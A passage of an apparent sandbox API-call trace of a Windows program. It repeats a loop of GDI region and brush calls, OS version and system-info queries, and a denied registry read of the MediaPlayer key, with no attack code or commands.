CombineRgn (hrgnDst=0x1047866, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=4) returned 2 [0092.427] CreateSolidBrush (color=0xff) returned 0x2107864 [0092.427] CreateSolidBrush (color=0xff0000) returned 0x1107867 [0092.427] DeleteObject (ho=0x1107867) returned 1 [0092.427] DeleteObject (ho=0xd50401d9) returned 1 [0092.427] DeleteObject (ho=0xd30401dc) returned 1 [0092.428] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.428] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.428] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.428] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.428] BeginPath (hdc=0x0) returned 0 [0092.428] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.428] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.428] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.428] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.428] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.428] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.428] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.428] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd60401d9 [0092.428] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd40401dc [0092.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047868 [0092.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047869 [0092.428] CombineRgn (hrgnDst=0x1047868, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=1) returned 1 [0092.428] CombineRgn (hrgnDst=0x1047869, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=4) returned 2 [0092.428] CreateSolidBrush (color=0xff) returned 0x2107867 [0092.428] CreateSolidBrush (color=0xff0000) returned 0x110786a [0092.428] DeleteObject (ho=0x110786a) returned 1 [0092.428] DeleteObject (ho=0xd40401dc) returned 1 [0092.428] DeleteObject (ho=0xd60401d9) returned 1 [0092.428] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.428] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.428] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.428] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.428] BeginPath (hdc=0x0) returned 0 [0092.428] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.428] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.428] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.428] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.429] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.429] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.429] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd50401dc [0092.429] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd70401d9 [0092.429] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104786b [0092.429] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104786c [0092.429] CombineRgn (hrgnDst=0x104786b, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=1) returned 1 [0092.429] CombineRgn (hrgnDst=0x104786c, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=4) returned 2 [0092.429] CreateSolidBrush (color=0xff) returned 0x210786a [0092.429] CreateSolidBrush (color=0xff0000) returned 0x110786d [0092.429] DeleteObject (ho=0x110786d) returned 1 [0092.429] DeleteObject (ho=0xd70401d9) returned 1 [0092.429] DeleteObject (ho=0xd50401dc) returned 1 [0092.429] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.429] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.429] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.429] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.429] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.429] BeginPath (hdc=0x0) returned 0 [0092.429] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.429] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.429] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.430] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.430] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.430] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd80401d9 [0092.430] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd60401dc [0092.430] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104786e [0092.430] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104786f [0092.430] CombineRgn (hrgnDst=0x104786e, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=1) returned 1 [0092.430] CombineRgn (hrgnDst=0x104786f, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=4) returned 2 [0092.430] CreateSolidBrush (color=0xff) returned 0x210786d [0092.430] CreateSolidBrush (color=0xff0000) returned 0x1107870 [0092.430] DeleteObject (ho=0x1107870) returned 1 [0092.430] DeleteObject (ho=0xd60401dc) returned 1 [0092.430] DeleteObject (ho=0xd80401d9) returned 1 [0092.430] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.430] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.430] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.430] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.430] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.430] BeginPath (hdc=0x0) returned 0 [0092.430] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.430] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.430] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.430] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.430] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.430] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd70401dc [0092.430] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd90401d9 [0092.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047871 [0092.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047872 [0092.431] CombineRgn (hrgnDst=0x1047871, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=1) returned 1 [0092.431] CombineRgn (hrgnDst=0x1047872, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=4) returned 2 [0092.431] CreateSolidBrush (color=0xff) returned 0x2107870 [0092.431] CreateSolidBrush (color=0xff0000) returned 0x1107873 [0092.431] DeleteObject (ho=0x1107873) returned 1 [0092.431] DeleteObject (ho=0xd90401d9) returned 1 [0092.431] DeleteObject (ho=0xd70401dc) returned 1 [0092.431] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.431] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.431] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.431] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.431] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.431] BeginPath (hdc=0x0) returned 0 [0092.431] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.431] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.431] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.431] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.431] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.431] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.431] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.431] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda0401d9 [0092.431] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd80401dc [0092.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047874 [0092.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047875 [0092.431] CombineRgn (hrgnDst=0x1047874, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=1) returned 1 [0092.431] CombineRgn (hrgnDst=0x1047875, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=4) returned 2 [0092.431] CreateSolidBrush (color=0xff) returned 0x2107873 [0092.431] CreateSolidBrush (color=0xff0000) returned 0x1107876 [0092.431] DeleteObject (ho=0x1107876) returned 1 [0092.431] DeleteObject (ho=0xd80401dc) returned 1 [0092.432] DeleteObject (ho=0xda0401d9) returned 1 [0092.432] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.432] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.432] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.432] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.432] BeginPath (hdc=0x0) returned 0 [0092.432] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.432] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.432] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.432] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.432] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd90401dc [0092.432] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb0401d9 [0092.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047877 [0092.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047878 [0092.432] CombineRgn (hrgnDst=0x1047877, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=1) returned 1 [0092.432] CombineRgn (hrgnDst=0x1047878, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=4) returned 2 [0092.432] CreateSolidBrush (color=0xff) returned 0x2107876 [0092.432] CreateSolidBrush (color=0xff0000) returned 0x1107879 [0092.432] DeleteObject (ho=0x1107879) returned 1 [0092.432] DeleteObject (ho=0xdb0401d9) returned 1 [0092.432] DeleteObject (ho=0xd90401dc) returned 1 [0092.432] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.432] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.432] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.432] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.432] BeginPath (hdc=0x0) returned 0 [0092.432] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.432] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.432] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.433] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc0401d9 [0092.433] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda0401dc [0092.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104787a [0092.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104787b [0092.433] CombineRgn (hrgnDst=0x104787a, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=1) returned 1 [0092.433] CombineRgn (hrgnDst=0x104787b, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=4) returned 2 [0092.433] CreateSolidBrush (color=0xff) returned 0x2107879 [0092.433] CreateSolidBrush (color=0xff0000) returned 0x110787c [0092.433] DeleteObject (ho=0x110787c) returned 1 [0092.433] DeleteObject (ho=0xda0401dc) returned 1 [0092.433] DeleteObject (ho=0xdc0401d9) returned 1 [0092.433] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.433] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.433] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.433] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.433] BeginPath (hdc=0x0) returned 0 [0092.433] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.433] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.433] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.433] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb0401dc [0092.433] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd0401d9 [0092.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104787d [0092.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104787e [0092.433] CombineRgn (hrgnDst=0x104787d, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=1) returned 1 [0092.433] CombineRgn (hrgnDst=0x104787e, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=4) returned 2 [0092.433] CreateSolidBrush (color=0xff) returned 0x210787c [0092.433] CreateSolidBrush (color=0xff0000) returned 0x110787f [0092.434] DeleteObject (ho=0x110787f) returned 1 [0092.434] DeleteObject (ho=0xdd0401d9) returned 1 [0092.434] DeleteObject (ho=0xdb0401dc) returned 1 [0092.434] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.434] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.434] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.434] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.434] BeginPath (hdc=0x0) returned 0 [0092.434] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.434] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.434] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.434] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.434] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde0401d9 [0092.434] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc0401dc [0092.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047880 [0092.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047881 [0092.434] CombineRgn (hrgnDst=0x1047880, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=1) returned 1 [0092.434] CombineRgn (hrgnDst=0x1047881, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=4) returned 2 [0092.434] CreateSolidBrush (color=0xff) returned 0x210787f [0092.434] CreateSolidBrush (color=0xff0000) returned 0x1107882 [0092.434] DeleteObject (ho=0x1107882) returned 1 [0092.434] DeleteObject (ho=0xdc0401dc) returned 1 [0092.434] DeleteObject (ho=0xde0401d9) returned 1 [0092.434] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.434] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 